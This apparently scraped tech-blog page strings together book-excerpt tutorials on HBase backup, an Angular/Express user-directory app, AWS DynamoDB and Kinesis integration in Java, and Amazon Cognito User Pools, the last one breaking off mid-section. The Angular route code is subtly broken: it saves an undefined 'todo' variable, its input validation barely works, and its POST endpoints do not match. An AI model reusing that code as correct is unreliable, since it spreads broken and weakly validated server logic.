During the backup process, HBase continues to execute write commands; this ensures the cluster remains available throughout the backup. Internally, the operation is done in parallel, so there is a chance of it being inconsistent. If the use case requires consistency, we have to pause writes to HBase. This can be achieved by passing the --consistent parameter while requesting a backup; it internally queues the writes and executes them as soon as the synchronization completes.
We learned about the configuration of HBase for the cloud, connected to an HBase cluster using the command line, and performed a backup and restore of HBase. If you found this post useful, do check out the book 'HBase High Performance Cookbook' to learn other concepts such as terminating an HBase cluster, accessing HBase data with Hive, and viewing HBase log files.
Understanding the HBase Ecosystem
Configuring HBase
5 Mistakes Developers make when working with HBase
Build user directory app with Angular [Tutorial]

Sugandha Lahoti
05 Jul 2018
12 min read
In this article, we will learn how to build a user directory with Angular. The app will have a REST API which will be created during the course of this example. In this simple example, we'll be creating a users app which will be a table with a list of users together with their email addresses and phone numbers. Each user in the table will have an active state whose value is a boolean. We will be able to change the active state of a particular user from false to true and vice versa. The app will give us the ability to add new users and also delete users from the table. diskDB will be used as the database for this example. We will have an Angular service which contains methods that will be responsible for communicating with the REST end points. These methods will be responsible for making get, post, put, and delete requests to the REST API. The first method in the service will be responsible for making a get request to the API. This will enable us to retrieve all the users from the back end. Next, we will have another method that makes a post request to the API. This will enable us to add new users to the array of existing users. The next method we shall have will be responsible for making a delete request to the API in order to enable the deletion of a user. Finally, we shall have a method that makes a put request to the API. This will be the method that gives us the ability to edit/modify the state of a user. In order to make these requests to the REST API, we will have to make use of the HttpModule. The aim of this section is to solidify your knowledge of HTTP. As a JavaScript and, in fact, an Angular developer, you are bound to make interactions with APIs and web servers almost all the time. So much data used by developers today is in form of APIs and in order to make interactions with these APIs, we need to constantly make use of HTTP requests. As a matter of fact, HTTP is the foundation of data communication for the web. This article is an excerpt from the book, TypeScript 2.x for Angular Developers, written by Chris Nwamba. Create a new Angular app To start a new Angular app, run the following command: ng new user This creates the Angular 2 user app. Install the following dependencies: Express Body-parser Cors npm install express body-parser cors --save Create a Node server Create a file called server.js at the root of the project directory. This will be our node server. Populate server.js with the following block of code: // Require dependencies const express = require('express'); const path = require('path'); const http = require('http'); const cors = require('cors'); const bodyParser = require('body-parser'); // Get our API routes const route = require('./route'); const app = express(); app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: false })); // Use CORS app.use(cors()); // Set our api routes app.use('/api', route); /** * Get port from environment. */ const port = process.env.PORT || '3000'; /** * Create HTTP server. */ const server = http.createServer(app); //Listen on provided port app.listen(port); console.log('server is listening'); What's going on here is pretty simple: We required and made use of the dependencies We defined and set the API routes We set a port for our server to listen to The API routes are being required from ./route, but this path does not exist yet. Let's quickly create it. At the root of the project directory, create a file called route.js. This is where the API routes will be made. 
We need to have a form of a database from where we can fetch, post, delete, and modify data. Just as in the previous example, we will make use of diskdb. The route will pretty much have the same pattern as in the first example. Install diskDB Run the following in the project folder to install diskdb: npm install diskdb Create a users.json file at the root of the project directory to serve as our database collection where we have our users' details. Populate users.json with the following: [{"name": "Marcel", "email": "test1@gmail.com", "phone_number":"08012345", "isOnline":false}] Now, update route.js. route.js const express = require('express'); const router = express.Router(); const db = require('diskdb'); db.connect(__dirname, ['users']); //save router.post('/users', function(req, res, next) { var user = req.body; if (!user.name && !(user.email + '') && !(user.phone_number + '') && !(user.isActive + '')) { res.status(400); res.json({ error: 'error' }); } else { console.log('ds'); db.users.save(todo); res.json(todo); } }); //get router.get('/users', function(req, res, next) { var foundUsers = db.users.find(); console.log(foundUsers); res.json(foundUsers); foundUsers = db.users.find(); console.log(foundUsers); }); //updateUsers router.put('/user/:id', function(req, res, next) { var updUser = req.body; console.log(updUser, req.params.id) db.users.update({_id: req.params.id}, updUser); res.json({ msg: req.params.id + ' updated' }); }); //delete router.delete('/user/:id', function(req, res, next) { console.log(req.params); db.users.remove({ _id: req.params.id }); res.json({ msg: req.params.id + ' deleted' }); }); module.exports = router; We've created a REST API with the API routes, using diskDB as the database. Start the server using the following command: node server.js The server is running and it is listening to the assigned port. Now, open up the browser and go to http://localhost:3000/api/users. Here, we can see the data that we imputed to the users.json file. This shows that our routes are working and we are getting data from the database. Create a new component Run the following command to create a new component: ng g component user This creates user.component.ts, user.component.html, user.component.css and user.component.spec.ts files. User.component.spec.ts is used for testing, therefore we will not be making use of it in this chapter. The newly created component is automatically imported into app.module.ts. We have to tell the root component about the user component. We'll do this by importing the selector from user.component.ts into the root template component (app.component.html): <div style="text-align:center"> <app-user></app-user> </div> Create a service The next step is to create a service that interacts with the API that we created earlier: ng generate service user This creates a user service called the user.service.ts. Next, import UserService class into app.module.ts and include it to the providers array: Import rxjs/add/operator/map in the imports section. import { Injectable } from '@angular/core'; import { Http, Headers } from '@angular/http'; import 'rxjs/add/operator/map'; Within the UserService class, define a constructor and pass in the angular 2 HTTP service. 
import { Injectable } from '@angular/core'; import { Http, Headers } from '@angular/http'; import 'rxjs/add/operator/map'; @Injectable() export class UserService { constructor(private http: Http) {} } Within the service class, write a method that makes a get request to fetch all users and their details from the API: getUser() { return this.http .get('http://localhost:3000/api/users') .map(res => res.json()); } Write the method that makes a post request and creates a new todo: addUser(newUser) { var headers = new Headers(); headers.append('Content-Type', 'application/json'); return this.http .post('http://localhost:3000/api/user', JSON.stringify(newUser), { headers: headers }) .map(res => res.json()); } Write another method that makes a delete request. This will enable us to delete a user from the collection of users: deleteUser(id) { return this.http .delete('http://localhost:3000/api/user/' + id) .map(res => res.json()); } Finally, write a method that makes a put request. This method will enable us to modify the state of a user: updateUser(user) { var headers = new Headers(); headers.append('Content-Type', 'application/json'); return this.http .put('http://localhost:3000/api/user/' + user._id, JSON.stringify(user), { headers: headers }) .map(res => res.json()); } Update app.module.ts to import HttpModule and FormsModule and include them to the imports array: import { HttpModule } from '@angular/http'; import { FormsModule } from '@angular/forms'; ..... imports: [ ..... HttpModule, FormsModule ] The next thing to do is to teach the user component to use the service: Import UserService in user.component.ts. import {UserService} from '../user.service'; Next, include the service class in the user component constructor. constructor(private userService: UserService) { }. Just below the exported UserComponent class, add the following properties and define their data types: users: any = []; user: any; name: any; email: any; phone_number: any; isOnline: boolean; Now, we can make use of the methods from the user service in the user component. Updating user.component.ts Within the ngOnInit method, make use of the user service to get all users from the API: ngOnInit() { this.userService.getUser().subscribe(users => { console.log(users); this.users = users; }); } Below the ngOnInit method, write a method that makes use of the post method in the user service to add new users: addUser(event) { event.preventDefault(); var newUser = { name: this.name, email: this.email, phone_number: this.phone_number, isOnline: false }; this.userService.addUser(newUser).subscribe(user => { this.users.push(user); this.name = ''; this.email = ''; this.phone_number = ''; }); } Let's make use of the delete method from the user service to enable us to delete users: deleteUser(id) { var users = this.users; this.userService.deleteUser(id).subscribe(data => { console.log(id); const index = this.users.findIndex(user => user._id == id); users.splice(index, 1) }); } Finally, we'll make use of user service to make put requests to the API: updateUser(user) { var _user = { _id: user._id, name: user.name, email: user.email, phone_number: user.phone_number, isActive: !user.isActive }; this.userService.updateUser(_user).subscribe(data => { const index = this.users.findIndex(user => user._id == _user._id) this.users[index] = _user; }); } We have all our communication with the API, service, and component. We have to update user.component.html in order to illustrate all that we have done in the browser. 
We'll be making use of bootstrap for styling. So, we have to import the bootstrap CDN in index.html: <!doctype html> <html lang="en"> <head> //bootstrap CDN <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M" crossorigin="anonymous"> <meta charset="utf-8"> <title>User</title> <base href="/"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" type="image/x-icon" href="favicon.ico"> </head> <body> <app-root></app-root> </body> </html> Updating user.component.html Here is the component template for the user component: <form class="form-inline" (submit) = "addUser($event)"> <div class="form-row"> <div class="col"> <input type="text" class="form-control" [(ngModel)] ="name" name="name"> </div> <div class="col"> <input type="text" class="form-control" [(ngModel)] ="email" name="email"> </div> <div class="col"> <input type="text" class="form-control" [(ngModel)] ="phone_number" name="phone_number"> </div> </div> <br> <button class="btn btn-primary" type="submit" (click) = "addUser($event)"><h4>Add User</h4></button> </form> <table class="table table-striped" > <thead> <tr> <th>Name</th> <th>Email</th> <th>Phone_Number</th> <th>Active</th> </tr> </thead> <tbody *ngFor="let user of users"> <tr> <td>{{user.name}}</td> <td>{{user.email}}</td> <td>{{user.phone_number}}</td> <td>{{user.isActive}}</td> <td><input type="submit" class="btn btn-warning" value="Update Status" (click)="updateUser(user)" [ngStyle]="{ 'text-decoration-color:': user.isActive ? 'blue' : ''}"></td> <td><button (click) ="deleteUser(user._id)" class="btn btn-danger">Delete</button></td> </tr> </tbody> </table> A lot is going on in the preceding code, let's drill down into the code block: We have a form which takes in three inputs and a submit button which triggers the addUser() method when clicked There is a delete button which triggers the delete method when it is clicked There is also an update status input element that triggers the updateUser() method when clicked We created a table in which our users' details will be displayed utilizing Angular's *ngFor directive and Angular's interpolation binding syntax, {{}} Some extra styling will be added to the project. Go to user.component.css and add the following: form{ margin-top: 20px; margin-left: 20%; size: 50px; } table{ margin-top:20px; height: 50%; width: 50%; margin-left: 20%; } button{ margin-left: 20px; } Running the app Open up two command line interfaces/terminals. In both of them, navigate to the project directory. Run node server.js to start the server in one. Run ng serve in the other to serve the Angular 2 app. Open up the browser and go to localhost:4200. In this simple users app, we can perform all CRUD operations. We can create new users, get users, delete users, and update the state of users. By default, a newly added user's active state is false. That can be changed by clicking on the change state button. We created an Angular app from scratch for building a user directory. To know more, on how to write unit tests and perform debugging in Angular, check our book TypeScript 2.x for Angular Developers. Everything new in Angular 6: Angular Elements, CLI commands and more Why switch to Angular for web development – Interview with Minko Gechev Building Components Using Angular
Integrate applications with AWS services: Amazon DynamoDB & Amazon Kinesis [Tutorial]

Natasha Mathur
05 Jul 2018
17 min read
AWS provides hybrid capabilities for networking, storage, database, application development, and management tools for secure and seamless integration. In today's tutorial, we will integrate applications with the two popular AWS services namely Amazon DynamoDB and Amazon Kinesis. Amazon DynamoDB is a fast, fully managed, highly available, and scalable NoSQL database service from AWS. DynamoDB uses key-value and document store data models. Amazon Kinesis is used to collect real-time data to process and analyze it. This article is an excerpt from a book 'Expert AWS Development' written by Atul V. Mistry. By the end of this tutorial, you will know how to integrate applications with the relative AWS services and best practices. Amazon DynamoDB The Amazon DynamoDB service falls under the Database category. It is a fast NoSQL database service from Amazon. It is highly durable as it will replicate data across three distinct geographical facilities in AWS regions. It's great for web, mobile, gaming, and IoT applications. DynamoDB will take care of software patching, hardware provisioning, cluster scaling, setup, configuration, and replication. You can create a database table and store and retrieve any amount and variety of data. It will delete expired data automatically from the table. It will help to reduce the usage storage and cost of storing data which is no longer needed. Amazon DynamoDB Accelerator (DAX) is a highly available, fully managed, and in-memory cache. For millions of requests per second, it reduces the response time from milliseconds to microseconds. DynamoDB is allowed to store up to 400 KB of large text and binary objects. It uses SSD storage to provide high I/O performance. Integrating DynamoDB into an application The following diagram provides a high-level overview of integration between your application and DynamoDB: Please perform the following steps to understand this integration: Your application in your programming language which is using an AWS SDK. DynamoDB can work with one or more programmatic interfaces provided by AWS SDK. From your programming language, AWS SDK will construct an HTTP or HTTPS request with a DynamoDB low-level API. The AWS SDK will send a request to the DynamoDB endpoint. DynamoDB will process the request and send the response back to the AWS SDK. If the request is executed successfully, it will return HTTP 200 (OK) response code. If the request is not successful, it will return HTTP error code and error message. The AWS SDK will process the response and send the result back to the application. The AWS SDK provides three kinds of interfaces to connect with DynamoDB. These interfaces are as follows: Low-level interface Document interface Object persistence (high-level) interface Let's explore all three interfaces. The following diagram is the Movies table, which is created in DynamoDB and used in all our examples: Low-level interface AWS SDK programming languages provide low-level interfaces for DynamoDB. These SDKs provide methods that are similar to low-level DynamoDB API requests. The following example uses the Java language for the low-level interface of AWS SDKs. Here you can use Eclipse IDE for the example. In this Java program, we request getItem from the Movies table, pass the movie name as an attribute, and print the movie release year: Let's create the MovieLowLevelExample file. We have to import a few classes to work with the DynamoDB. AmazonDynamoDBClient is used to create the DynamoDB client instance. 
AttributeValue is used to construct the data. In AttributeValue, name is datatype and value is data: GetItemRequest is the input of GetItem GetItemResult is the output of GetItem The following code will create the dynamoDB client instance. You have to assign the credentials and region to this instance: Static AmazonDynamoDBClient dynamoDB; In the code, we have created HashMap, passing the value parameter as AttributeValue().withS(). It contains actual data and withS is the attribute of String: String tableName = "Movies"; HashMap<String, AttributeValue> key = new HashMap<String, AttributeValue>(); key.put("name", new AttributeValue().withS("Airplane")); GetItemRequest will create a request object, passing the table name and key as a parameter. It is the input of GetItem: GetItemRequest request = new GetItemRequest() .withTableName(tableName).withKey(key); GetItemResult will create the result object. It is the output of getItem where we are passing request as an input: GetItemResult result = dynamoDB.getItem(request); It will check the getItem null condition. If getItem is not null then create the object for AttributeValue. It will get the year from the result object and create an instance for yearObj. It will print the year value from yearObj: if (result.getItem() != null) { AttributeValue yearObj = result.getItem().get("year"); System.out.println("The movie Released in " + yearObj.getN()); } else { System.out.println("No matching movie was found"); } Document interface This interface enables you to do Create, Read, Update, and Delete (CRUD) operations on tables and indexes. The datatype will be implied with data from this interface and you do not need to specify it. The AWS SDKs for Java, Node.js, JavaScript, and .NET provides support for document interfaces. The following example uses the Java language for the document interface in AWS SDKs. Here you can use the Eclipse IDE for the example. In this Java program, we will create a table object from the Movies table, pass the movie name as attribute, and print the movie release year. We have to import a few classes. DynamoDB is the entry point to use this library in your class. GetItemOutcomeis is used to get items from the DynamoDB table. Table is used to get table details: static AmazonDynamoDB client; The preceding code will create the client instance. You have to assign the credentials and region to this instance: String tableName = "Movies"; DynamoDB docClient = new DynamoDB(client); Table movieTable = docClient.getTable(tableName); DynamoDB will create the instance of docClient by passing the client instance. It is the entry point for the document interface library. This docClient instance will get the table details by passing the tableName and assign it to the movieTable instance: GetItemOutcome outcome = movieTable.getItemOutcome("name","Airplane"); int yearObj = outcome.getItem().getInt("year"); System.out.println("The movie was released in " + yearObj); GetItemOutcome will create an outcome instance from movieTable by passing the name as key and movie name as parameter. It will retrieve the item year from the outcome object and store it into the yearObj object and print it: Object persistence (high-level) interface In the object persistence interface, you will not perform any CRUD operations directly on the data; instead, you have to create objects which represent DynamoDB tables and indexes and perform operations on those objects. It will allow you to write object-centric code and not database-centric code. 
The AWS SDKs for Java and .NET provide support for the object persistence interface. Let's create a DynamoDBMapper object in AWS SDK for Java. It will represent data in the Movies table. This is the MovieObjectMapper.java class. Here you can use the Eclipse IDE for the example. You need to import a few classes for annotations. DynamoDBAttribute is applied to the getter method. If it will apply to the class field then its getter and setter method must be declared in the same class. The DynamoDBHashKey annotation marks property as the hash key for the modeled class. The DynamoDBTable annotation marks DynamoDB as the table name: @DynamoDBTable(tableName="Movies") It specifies the table name: @DynamoDBHashKey(attributeName="name") public String getName() { return name;} public void setName(String name) {this.name = name;} @DynamoDBAttribute(attributeName = "year") public int getYear() { return year; } public void setYear(int year) { this.year = year; } In the preceding code, DynamoDBHashKey has been defined as the hash key for the name attribute and its getter and setter methods. DynamoDBAttribute specifies the column name and its getter and setter methods. Now create MovieObjectPersistenceExample.java to retrieve the movie year: static AmazonDynamoDB client; The preceding code will create the client instance. You have to assign the credentials and region to this instance. You need to import DynamoDBMapper, which will be used to fetch the year from the Movies table: DynamoDBMapper mapper = new DynamoDBMapper(client); MovieObjectMapper movieObjectMapper = new MovieObjectMapper(); movieObjectMapper.setName("Airplane"); The mapper object will be created from DynamoDBMapper by passing the client. The movieObjectMapper object will be created from the POJO class, which we created earlier. In this object, set the movie name as the parameter: MovieObjectMapper result = mapper.load(movieObjectMapper); if (result != null) { System.out.println("The song was released in "+ result.getYear()); } Create the result object by calling DynamoDBMapper object's load method. If the result is not null then it will print the year from the result's getYear() method. DynamoDB low-level API This API is a protocol-level interface which will convert every HTTP or HTTPS request into the correct format with a valid digital signature. It uses JavaScript Object Notation (JSON) as a transfer protocol. AWS SDK will construct requests on your behalf and it will help you concentrate on the application/business logic. The AWS SDK will send a request in JSON format to DynamoDB and DynamoDB will respond in JSON format back to the AWS SDK API. DynamoDB will not persist data in JSON format. Troubleshooting in Amazon DynamoDB The following are common problems and their solutions: If error logging is not enabled then enable it and check error log messages. Verify whether the DynamoDB table exists or not. Verify the IAM role specified for DynamoDB and its access permissions. AWS SDKs take care of propagating errors to your application for appropriate actions. Like Java programs, you should write a try-catch block to handle the error or exception. If you are not using an AWS SDK then you need to parse the content of low-level responses from DynamoDB. 
A few exceptions are as follows: AmazonServiceException: Client request sent to DynamoDB but DynamoDB was unable to process it and returned an error response AmazonClientException: Client is unable to get a response or parse the response from service ResourceNotFoundException: Requested table doesn't exist or is in CREATING state Now let's move on to Amazon Kinesis, which will help to collect and process real-time streaming data. Amazon Kinesis The Amazon Kinesis service is under the Analytics product category. This is a fully managed, real-time, highly scalable service. You can easily send data to other AWS services such as Amazon DynamoDB, AmazaonS3, and Amazon Redshift. You can ingest real-time data such as application logs, website clickstream data, IoT data, and social stream data into Amazon Kinesis. You can process and analyze data when it comes and responds immediately instead of waiting to collect all data before the process begins. Now, let's explore an example of using Kinesis streams and Kinesis Firehose using AWS SDK API for Java. Amazon Kinesis streams In this example, we will create the stream if it does not exist and then we will put the records into the stream. Here you can use Eclipse IDE for the example. You need to import a few classes. AmazonKinesis and AmazonKinesisClientBuilder are used to create the Kinesis clients. CreateStreamRequest will help to create the stream. DescribeStreamRequest will describe the stream request. PutRecordRequest will put the request into the stream and PutRecordResult will print the resulting record. ResourceNotFoundException will throw an exception when the stream does not exist. StreamDescription will provide the stream description: Static AmazonKinesis kinesisClient; kinesisClient is the instance of AmazonKinesis. You have to assign the credentials and region to this instance: final String streamName = "MyExampleStream"; final Integer streamSize = 1; DescribeStreamRequest describeStreamRequest = new DescribeStreamRequest().withStreamName(streamName); Here you are creating an instance of describeStreamRequest. For that, you will pass the streamNameas parameter to the withStreamName() method: StreamDescription streamDescription = kinesisClient.describeStream(describeStreamRequest).getStreamDescription(); It will create an instance of streamDescription. You can get information such as the stream name, stream status, and shards from this instance: CreateStreamRequest createStreamRequest = new CreateStreamRequest(); createStreamRequest.setStreamName(streamName); createStreamRequest.setShardCount(streamSize); kinesisClient.createStream(createStreamRequest); The createStreamRequest instance will help to create a stream request. You can set the stream name, shard count, and SDK request timeout. In the createStream method, you will pass the createStreamRequest: long createTime = System.currentTimeMillis(); PutRecordRequest putRecordRequest = new PutRecordRequest(); putRecordRequest.setStreamName(streamName); putRecordRequest.setData(ByteBuffer.wrap(String.format("testData-%d", createTime).getBytes())); putRecordRequest.setPartitionKey(String.format("partitionKey-%d", createTime)); Here we are creating a record request and putting it into the stream. We are setting the data and PartitionKey for the instance. 
It will create the records: PutRecordResult putRecordResult = kinesisClient.putRecord(putRecordRequest); It will create the record from the putRecord method and pass putRecordRequest as a parameter: System.out.printf("Success : Partition key "%s", ShardID "%s" and SequenceNumber "%s".n", putRecordRequest.getPartitionKey(), putRecordResult.getShardId(), putRecordResult.getSequenceNumber()); It will print the output on the console as follows: Troubleshooting tips for Kinesis streams The following are common problems and their solutions: Unauthorized KMS master key permission error: Without authorized permission on the master key, when a producer or consumer application tries to writes or reads an encrypted stream Provide access permission to an application using Key policies in AWS KMS or IAM policies with AWS KMS Sometimes producer becomes writing slower. Service limits exceeded: Check whether the producer is throwing throughput exceptions from the service, and validate what API operations are being throttled. You can also check Amazon Kinesis Streams limits because of different limits based on the call. If calls are not an issue, check you have selected a partition key that allows distributing put operations evenly across all shards, and that you don't have a particular partition key that's bumping into the service limits when the rest are not. This requires you to measure peak throughput and the number of shards in your stream. Producer optimization: It has either a large producer or small producer. A large producer is running from an EC2 instance or on-premises while a small producer is running from the web client, mobile app, or IoT device. Customers can use different strategies for latency. Kinesis Produce Library or multiple threads are useful while writing for buffer/micro-batch records, PutRecords for multi-record operation, PutRecord for single-record operation. Shard iterator expires unexpectedly: The shard iterator expires because its GetRecord methods have not been called for more than 5 minutes, or you have performed a restart of your consumer application. The shard iterator expires immediately before you use it. This might indicate that the DynamoDB table used by Kinesis does not have enough capacity to store the data. It might happen if you have a large number of shards. Increase the write capacity assigned to the shard table to solve this. Consumer application is reading at a slower rate: The following are common reasons for read throughput being slower than expected: Total reads for multiple consumer applications exceed per-shard limits. In the Kinesis stream, increase the number of shards. Maximum number of GetRecords per call may have been configured with a low limit value. The logic inside the processRecords call may be taking longer for a number of possible reasons; the logic may be CPU-intensive, bottlenecked on synchronization, or I/O blocking. We have covered Amazon Kinesis streams. Now, we will cover Kinesis Firehose. Amazon Kinesis Firehose Amazon Kinesis Firehose is a fully managed, highly available and durable service to load real-time streaming data easily into AWS services such as Amazon S3, Amazon Redshift, or Amazon Elasticsearch. It replicates your data synchronously at three different facilities. It will automatically scale as per throughput data. You can compress your data into different formats and also encrypt it before loading. 
AWS SDK for Java, Node.js, Python, .NET, and Ruby can be used to send data to a Kinesis Firehose stream using the Kinesis Firehose API. The Kinesis Firehose API provides two operations to send data to the Kinesis Firehose delivery stream: PutRecord: In one call, it will send one record PutRecordBatch: In one call, it will send multiple data records Let's explore an example using PutRecord. In this example, the MyFirehoseStream stream has been created. Here you can use Eclipse IDE for the example. You need to import a few classes such as AmazonKinesisFirehoseClient, which will help to create the client for accessing Firehose. PutRecordRequest and PutRecordResult will help to put the stream record request and its result: private static AmazonKinesisFirehoseClient client; AmazonKinesisFirehoseClient will create the instance firehoseClient. You have to assign the credentials and region to this instance: String data = "My Kinesis Firehose data"; String myFirehoseStream = "MyFirehoseStream"; Record record = new Record(); record.setData(ByteBuffer.wrap(data.getBytes(StandardCharsets.UTF_8))); As mentioned earlier, myFirehoseStream has already been created. A record in the delivery stream is a unit of data. In the setData method, we are passing a data blob. It is base-64 encoded. Before sending a request to the AWS service, Java will perform base-64 encoding on this field. A returned ByteBuffer is mutable. If you change the content of this byte buffer then it will reflect to all objects that have a reference to it. It's always best practice to call ByteBuffer.duplicate() or ByteBuffer.asReadOnlyBuffer() before reading from the buffer or using it. Now you have to mention the name of the delivery stream and the data records you want to create the PutRecordRequest instance: PutRecordRequest putRecordRequest = new PutRecordRequest() .withDeliveryStreamName(myFirehoseStream) .withRecord(record); putRecordRequest.setRecord(record); PutRecordResult putRecordResult = client.putRecord(putRecordRequest); System.out.println("Put Request Record ID: " + putRecordResult.getRecordId()); putRecordResult will write a single record into the delivery stream by passing the putRecordRequest and get the result and print the RecordID: PutRecordBatchRequest putRecordBatchRequest = new PutRecordBatchRequest().withDeliveryStreamName("MyFirehoseStream") .withRecords(getBatchRecords()); You have to mention the name of the delivery stream and the data records you want to create the PutRecordBatchRequest instance. The getBatchRecord method has been created to pass multiple records as mentioned in the next step: JSONObject jsonObject = new JSONObject(); jsonObject.put("userid", "userid_1"); jsonObject.put("password", "password1"); Record record = new Record().withData(ByteBuffer.wrap(jsonObject.toString().getBytes())); records.add(record); In the getBatchRecord method, you will create the jsonObject and put data into this jsonObject . You will pass jsonObject to create the record. These records add to a list of records and return it: PutRecordBatchResult putRecordBatchResult = client.putRecordBatch(putRecordBatchRequest); for(int i=0;i<putRecordBatchResult.getRequestResponses().size();i++){ System.out.println("Put Batch Request Record ID :"+i+": " + putRecordBatchResult.getRequestResponses().get(i).getRecordId()); } putRecordBatchResult will write multiple records into the delivery stream by passing the putRecordBatchRequest, get the result, and print the RecordID. 
You will see the output like the following screen: Troubleshooting tips for Kinesis Firehose Sometimes data is not delivered at specified destinations. The following are steps to solve common issues while working with Kinesis Firehose: Data not delivered to Amazon S3: If error logging is not enabled then enable it and check error log messages for delivery failure. Verify that the S3 bucket mentioned in the Kinesis Firehose delivery stream exists. Verify whether data transformation with Lambda is enabled, the Lambda function mentioned in your delivery stream exists, and Kinesis Firehose has attempted to invoke the Lambda function. Verify whether the IAM role specified in the delivery stream has given proper access to the S3 bucket and Lambda function or not. Verify your Kinesis Firehose metrics to check whether the data was sent to the Kinesis Firehose delivery stream successfully. Data not delivered to Amazon Redshift/Elasticsearch: For Amazon Redshift and Elasticsearch, verify the points mentioned in Data not delivered to Amazon S3, including the IAM role, configuration, and public access. For CloudWatch and IoT, delivery stream not available as target: Some AWS services can only send messages and events to a Kinesis Firehose delivery stream which is in the same region. Verify that your Kinesis Firehose delivery stream is located in the same region as your other services. We completed implementations, examples, and best practices for Amazon DynamoDB and Amazon Kinesis AWS services using AWS SDK. If you found this post useful, do check out the book 'Expert AWS Development' to learn application integration with other AWS services like Amazon Lambda, Amazon SQS, and Amazon SWF. A serverless online store on AWS could save you money. Build one. Why is AWS the preferred cloud platform for developers working with big data? Verizon chooses Amazon Web Services(AWS) as its preferred cloud provider
Amazon Cognito for secure mobile and web user authentication [Tutorial]

Natasha Mathur
04 Jul 2018
13 min read
Amazon Cognito is a user authentication service that enables user sign-up and sign-in, and access control for mobile and web applications, easily, quickly, and securely. In Amazon Cognito, you can create your user directory, which allows the application to work when the devices are not online. Amazon Cognito supports, to scale, millions of users and authenticates users from social identity providers such as Facebook, Google, Twitter, Amazon, or enterprise identity providers, such as Microsoft Active Directory through SAML, or your own identity provider system. Today, we will discuss the AWS Cognito service for simple and secure user authentication for mobile and web applications. With Amazon Cognito, you can concentrate on developing great application experiences for the user, instead of worrying about developing secure and scalable application solutions for handling the access control permissions of users and synchronization across the devices. Let's explore topics that fall under AWS Cognito and see how it can be used for user authentication from AWS. This article is an excerpt from a book 'Expert AWS Development' written by Atul V. Mistry. Amazon Cognito benefits Amazon Cognito is a fully managed service and it provides User Pools for a secure user directory to scale millions of users; these User Pools are easy to set up. Amazon Cognito User Pools are standards-based identity providers, Amazon Cognito supports many identity and access management standards such as OAuth 2.0, SAML 2.0, OAuth 2.0 and OpenID Connect. Amazon Cognito supports the encryption of data in transit or at rest and multi-factor authentication. With Amazon Cognito, you can control access to the backend resource from the application. You can control the users by defining roles and map different roles for the application, so they can access the application resource for which they are authorized. Amazon Cognito can integrate easily with the sign-up and sign-in for the app because it provides a built-in UI and configuration for different federating identity providers. It provides the facility to customize the UI, as per company branding, in front and center for user interactions. Amazon Cognito is eligible for HIPAA-BAA and is compliant with PCI DSS, SOC 1-3, and ISO 27001. Amazon Cognito features Amazon Cognito provides the following features: Amazon Cognito Identity User Pools Federated Identities Amazon Cognito Sync Data synchronization Today we will discuss User Pools and Federated Identities in detail. Amazon Cognito User Pools Amazon Cognito User Pools helps to create and maintain a directory for users and adds sign-up/sign-in to mobile or web applications. Users can sign in to a User Pool through social or SAML-based identity providers. Enhanced security features such as multi-factor authentication and email/phone number verification can be implemented for your application. With AWS Lambda, you can customize your workflows for Amazon Cognito User Pools such as adding application specific logins for user validation and registration for fraud detection. Getting started with Amazon Cognito User Pools You can create Amazon Cognito User Pools through Amazon Cognito Console, AWS Command Line Interface (CLI), or Amazon Cognito Application Programming Interface (API). Now let's understand all these different ways of creating User Pools. Amazon Cognito User Pool creation from the console Please perform the following steps to create a User Pool from the console. 
Log in to the AWS Management console and select the Amazon Cognito service. It will show you two options, such as Manage your User Pools and Manage Federated Identities, as shown: Select Manage Your User Pools. It will take you to the Create a user pool screen. You can add the Pool name and create the User Pool. You can create this user pool in two different ways, by selecting: Review defaults: It comes with default settings and if required, you can customize it Step through settings: Step by step, you can customize each setting: When you select Review defaults, you will be taken to the review User Pool configuration screen and then select Create pool. When you will select Step through settings, you will be taken to the Attributes screen to customize it. Let's understand all the screens in brief: Attributes: This gives the option for users to sign in with a username, email address, or phone number. You can select standard attributes for user profiles as well create custom attributes. Policies: You can set the password strength, allow users to sign in themselves, and stipulate days until expire for the newly created account. MFA and verifications: This allows you to enable Multi-Factor Authentication, and configure require verification for emails and phone numbers. You create a new IAM role to set permissions for Amazon Cognito that allows you to send SMS message to users on your behalf. Message customizations: You can customize messages to verify an email address by providing a verification code or link. You can customize user invitation messages for SMS and email but you must include the username and a temporary password. You can customize email addresses from SES-verified identities. Tags: You can add tags for this User Pool by providing tag keys and their values. Devices: This provides settings to remember a user's device. It provides options such as Always, User Opt In, and No. App clients: You can add app clients by giving unique IDs and an optional secret key to access this User Pool. Triggers: You can customize workflows and user experiences by triggering AWS Lambda functions for different events. Reviews: This shows you all the attributes for review. You can edit any attribute on the Reviews screen and then click on Create pool. It will create the User Pool. After creating a new User Pool, navigate to the App clients screen. Enter the App client name as CognitoDemo and click on Create app client: Once this Client App is generated, you can click on the show details to see App client secret: Pool Id, App client id, and App client secret are required to connect any application to Amazon Cognito. Now, we will explore an Amazon Cognito User Pool example to sign up and sign in the user. Amazon Cognito example for Android with mobile SDK In this example, we will perform some tasks such as create a new user, request confirmation code for a new user through email, confirm user, user login, and so on. Create a Cognito User Pool: To create a User Pool with the default configuration, you have to pass parameters to the CognitoUserPool constructor, such as application context, userPoolId, clientId, clientSecret, and cognitoRegion (optional): CognitoUserPool userPool = new CognitoUserPool(context, userPoolId, clientId, clientSecret, cognitoRegion); New user sign-up: Please perform the following steps to sign up new users: Collect information from users such as username, password, given name, phone number, and email address. 
